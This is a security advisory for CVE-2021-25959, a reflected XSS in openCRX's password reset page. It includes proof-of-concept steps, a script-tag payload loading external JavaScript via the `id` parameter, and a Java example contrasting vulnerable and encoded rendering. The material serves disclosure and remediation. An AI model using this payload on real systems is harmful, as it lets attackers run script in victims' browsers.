
CVE-2021-25959

Date: September 28, 2021

Overview

openCRX versions v4.0.0 through v5.1.0 are vulnerable to reflected Cross-site Scripting (XSS) due to unsanitized parameters in the password reset functionality. This allows an attacker to load and execute an external JavaScript file in the browser of any user of the openCRX instance.

Details

openCRX is affected by a reflected XSS vulnerability that allows an external JavaScript file to be loaded and executed in the browser of any user of the openCRX instance. The vulnerability exists because parameters of the password reset functionality are written back into the page without sanitization or output encoding.

PoC Details

Log in to the application as guest:guest by visiting http://localhost:8080/opencrx-core-CRX.
Click on Security, then Request password reset, and click OK. A password reset link appears in the Alerts tab. Click on the yellow icon to open it and copy the password reset URL. A password reset URL looks like this:
“http://localhost:8080/opencrx-core-CRX/PasswordResetConfirm.jsp?t=cO6BzWLpIElr5CF4n8IjzzZPmKrOuE1OIcJLIMWZ&p=CRX&s=Standard&id=guest”.
Insert the payload given below as the value of the `id` parameter (note: change the IP address and port accordingly).
Create a file poc.js locally and start a Python HTTP server in the directory containing that file. Now log in as admin-Standard:admin-Standard in a private window and paste the URL with the payload in the `id` parameter value. The external JS file is loaded and executed.

PoC Code

<script src="http://10.0.2.15/poc.js"></script>

Affected Environments

v4.0.0 - v5.1.0

Prevention

Upgrade to version org.opencrx:opencrx-core-config:5.2.0
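For developers maintaining a similar page, the following is an added illustration of the pattern behind this advisory and of its fix; it is not openCRX code. It renders a hypothetical hidden `id` field the way a vulnerable JSP would (raw parameter concatenated into markup) next to a hardened rendering that HTML-encodes the value, and adds an upstream allowlist check on the user id as a second layer. The request parameters, the username policy regex, the token and the host are all constructed placeholders.

```java
import java.util.Map;
import java.util.regex.Pattern;

/**
 * Added illustration, not openCRX code: a reflected-XSS sink on a password
 * reset confirmation page (a request parameter written straight into the
 * HTML), shown beside a hardened version that encodes the value on output.
 */
public class PasswordResetRender {

    /** Constructed request parameters; token and host are placeholders. */
    static final Map<String, String> PARAMS = Map.of(
        "t", "TOKEN-PLACEHOLDER",
        "p", "CRX",
        "s", "Standard",
        "id", "guest\"><script src=\"http://EXAMPLE-HOST/poc.js\"></script>"
    );

    /** Assumed username policy for this demo: 1-64 chars of [A-Za-z0-9._-]. */
    static final Pattern USER_ID = Pattern.compile("^[A-Za-z0-9._-]{1,64}$");

    /** Vulnerable rendering: the id value is concatenated untouched (CWE-79). */
    static String renderVulnerable(String id) {
        return "<input type=\"hidden\" name=\"id\" value=\"" + id + "\">";
    }

    /** Hardened rendering: the same markup, value encoded for an attribute context. */
    static String renderHardened(String id) {
        return "<input type=\"hidden\" name=\"id\" value=\"" + escapeHtml(id) + "\">";
    }

    /** Upstream check: reject ids that do not match the username policy. */
    static boolean isAcceptableUserId(String id) {
        return id != null && USER_ID.matcher(id).matches();
    }

    /**
     * Minimal encoder for the five characters that can terminate text or a
     * quoted attribute. In production JSP use JSTL's c:out or OWASP Java
     * Encoder's Encode.forHtmlAttribute rather than a hand-rolled encoder.
     */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    /** Detection helper: does the rendered HTML still contain a raw script tag? */
    static boolean containsScriptTag(String html) {
        return html.toLowerCase().contains("<script");
    }

    public static void main(String[] args) {
        String id = PARAMS.get("id");

        String bad = renderVulnerable(id);
        System.out.println("vulnerable: " + bad);
        System.out.println("  raw script tag present: " + containsScriptTag(bad));

        String good = renderHardened(id);
        System.out.println("hardened:   " + good);
        System.out.println("  raw script tag present: " + containsScriptTag(good));

        // The allowlist check would have stopped this value before rendering at all.
        System.out.println("id passes username policy: " + isAcceptableUserId(id));
        System.out.println("'guest' passes username policy: " + isAcceptableUserId("guest"));
    }
}
```

Compile and run with `javac PasswordResetRender.java && java PasswordResetRender`. In JSP terms, `renderVulnerable` corresponds to writing `<%= request.getParameter("id") %>` into the page, while `renderHardened` corresponds to `<c:out value="${param.id}"/>`, which escapes `<`, `>`, `&`, `'` and `"` by default. Output encoding at the sink is the fix that closes this class of bug; the allowlist check is defense in depth and does not replace it.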

Language: Java

Good to know:

Weakness: Cross-Site Scripting (XSS), CWE-79


CVSS v3 base metrics (AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N):
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

CVSS v2 base metrics (AV:N/AC:M/Au:N/C:N/I:P/A:N):
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): None
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None